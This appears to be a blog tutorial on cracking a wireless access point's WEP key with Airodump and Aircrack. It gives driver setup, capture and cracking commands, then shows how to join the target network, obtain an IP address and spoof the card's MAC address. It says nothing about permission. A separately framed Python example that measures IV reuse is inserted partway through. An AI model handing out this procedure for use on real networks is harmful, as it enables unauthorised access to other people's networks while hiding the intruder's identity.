Before you can start cracking a wireless AP, you need some preparation:
You need to switch your WLAN card into monitor mode. The regular Windows drivers provided by the manufacturer will NOT support this feature; you need special drivers. Wildpackets.com provides those drivers for free, but only for a limited range of cards, so check their website for supported hardware. After you have installed those drivers, you can use Airodump. There is one drawback on the Windows platform: packet injection is not supported. There are some commercial tools available, but (I think) they need a special driver too, so forget it.
You need two additional files to run Airodump, peek.dll and peek5.sys, available from wildpackets.com: download the evaluation version of AiroPeek NX and install it, and you will find those two files there. Be aware that the Windows version of Airodump is not 100% stable; from time to time, when you close Airodump, peek5.sys causes a BSOD, and the reason is still unknown. Also, don’t put your laptop into sleep mode while Airodump is running, as you will get a BSOD as well! To run Aircrack you need this file: cygwin1.dll. The easiest way to get the peek files is to visit this link.
VMWare for Windows:
It *should* work, but only with USB wireless NICs. This is due to a VMWare limitation which doesn’t allow direct hardware access: your PC-Card would be mapped as a regular NIC. I can’t test this, as I don’t own a USB wireless NIC.
The easiest way is to use a live distribution like Auditor or BackTrack. Those distributions are bootable from CD and packed with all the tools and drivers you need. I’m using the Proxim Orinoco card 8480-WD; to put this card into monitor mode, you need the madwifi driver (Auditor 2.0, for example, uses the driver ath_pci, and this driver does not support monitor mode). As you can see, it’s not that simple. Check this site for a complete WLAN adapter chipset directory (ok, a bit outdated…). Get the BackTrack distro from here.
To crack a WEP key, you need to collect a lot of IVs. The Aircrack readme provides these lines:
How do I crack a static WEP key?
The basic idea is to capture as much encrypted traffic as possible using Airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run Aircrack on the resulting capture file.
How many IVs are required to crack WEP?
WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you’re out of luck you may need two million IVs, or more.
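To see why the 3-byte IV is the weak point, here is an added example (my own code, not from the Aircrack readme or the tools described here): it pulls the IV out of constructed 802.11 data frames that carry the Protected bit, counts how many distinct IVs a capture contains and flags any IV that is reused, and estimates how quickly a single busy station burns through the entire 24-bit IV space. The frame layout (24-byte MAC header, then IV and key-id byte) follows the 802.11 standard; the sample frames and the 500 frames/s rate are constructed values.

```python
from collections import Counter

IV_SPACE = 1 << 24  # a WEP IV is 24 bits wide, so only 16,777,216 distinct IVs exist

def build_wep_data_frame(iv: bytes, key_id: int = 0, body: bytes = b"\x00" * 8) -> bytes:
    """Constructed 802.11 data frame with the Protected bit set (test input, not a real capture)."""
    fc = bytes([0x08, 0x41])                         # type = data; flags = ToDS | Protected
    addrs = b"\x00\x11\x22\x33\x44\x55" * 3          # constructed addr1/addr2/addr3
    header = fc + b"\x00\x00" + addrs + b"\x00\x00"  # 24-byte MAC header (duration, addresses, seq ctrl)
    return header + iv + bytes([(key_id & 3) << 6]) + body

def extract_wep_ivs(frames):
    """Return the 3-byte IV of every protected data frame; management/control frames are skipped."""
    ivs = []
    for f in frames:
        if len(f) < 28:                              # header (24) + IV (3) + key-id byte (1)
            continue
        is_data = (f[0] & 0x0C) == 0x08              # frame-control type bits == data
        protected = bool(f[1] & 0x40)                # Protected (formerly "WEP") flag
        if is_data and protected:
            ivs.append(f[24:27])
    return ivs

def iv_report(frames):
    """Count distinct IVs, flag any IV seen more than once, and report IV-space coverage."""
    counts = Counter(extract_wep_ivs(frames))
    return {
        "frames": sum(counts.values()),
        "distinct": len(counts),
        "reused": {iv.hex(): n for iv, n in counts.items() if n > 1},
        "coverage": len(counts) / IV_SPACE,
    }

def hours_to_exhaust_iv_space(frames_per_second: float) -> float:
    """Time until a busy station has cycled through every IV and must start repeating them."""
    return IV_SPACE / frames_per_second / 3600

if __name__ == "__main__":
    # Constructed sample: five frames with fresh IVs, one that reuses IV 000001, one beacon.
    sample = [build_wep_data_frame(bytes([0, 0, i])) for i in range(5)]
    sample.append(build_wep_data_frame(b"\x00\x00\x01"))
    sample.append(b"\x80\x00" + b"\x00" * 30)        # management frame (beacon), carries no IV
    print(iv_report(sample))
    print(f"{hours_to_exhaust_iv_space(500):.1f} h until the IV space is exhausted at 500 frames/s")
```

At 500 frames per second the whole IV space is used up in under ten hours, which is why the readme's IV counts are reachable on a busy network and why a reused IV in a capture is a sign the network should have moved off WEP.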
Now we fire up Airodump to collect those IVs:
Start “airodump.exe” and select the right driver.
Known network adapters:
14 Intel(R) PRO/Wireless 2200BG Network Connection
27 Atheros Wireless Network Adapter
Network interface index number -> 27
Interface types: 'o' = HermesI/Realtek
'a' = Aironet/Atheros
Network interface type (o/a) -> a
Channel(s): 1 to 14, 0 = all -> 0
(note: if you specify the same output prefix, airodump will resume
the capture session by appending data to the existing capture file)
Output filename prefix -> neophob
(note: to save space and only store the captured WEP IVs, press y.
The resulting capture file will only be useful for WEP cracking)
Only write WEP IVs (y/n) -> n
Set the wireless NIC into monitor mode. I use ath0 as my wireless card; replace this with your card.
# airmon.sh start ath0 0
Now start airodump: airodump <NIC> <FILENAME> <CHANNEL>. If you use 0 for the channel, all channels will be scanned. Here is an example:
# airodump ath0 out 0
Depending on your distribution, you need another command to set the card into monitor mode:
#iwpriv ath0 monitor 2 1 (enables monitor mode)
#iwpriv ath0 monitor 0 1 (disables monitor mode)
Now wait until you have collected about 900’000 IVs. If there is no traffic on the AP, no IVs will be transmitted. You can generate traffic by using Aireplay; more about this later.
Start Aircrack to get the WEP key:
> aircrack -a 1 out.ivs -w /path/to/wordlist
Select the BSSID you want to crack and wait.
If you succeeded, log on to the AP:
#iwconfig ath0 mode managed key 00:11:22:…. essid ESSID channel 11
#ifconfig ath0 up
Get an IP address via DHCP:
# dhcpcd ath0
Fake the MAC address:
#ifconfig ath0 down
#ifconfig ath0 hw ether 00:11:22:33:44:55
#ifconfig ath0 up
In the next article we will inject some packets to speed up the whole process, and we will show a WPA-PSK crack as well.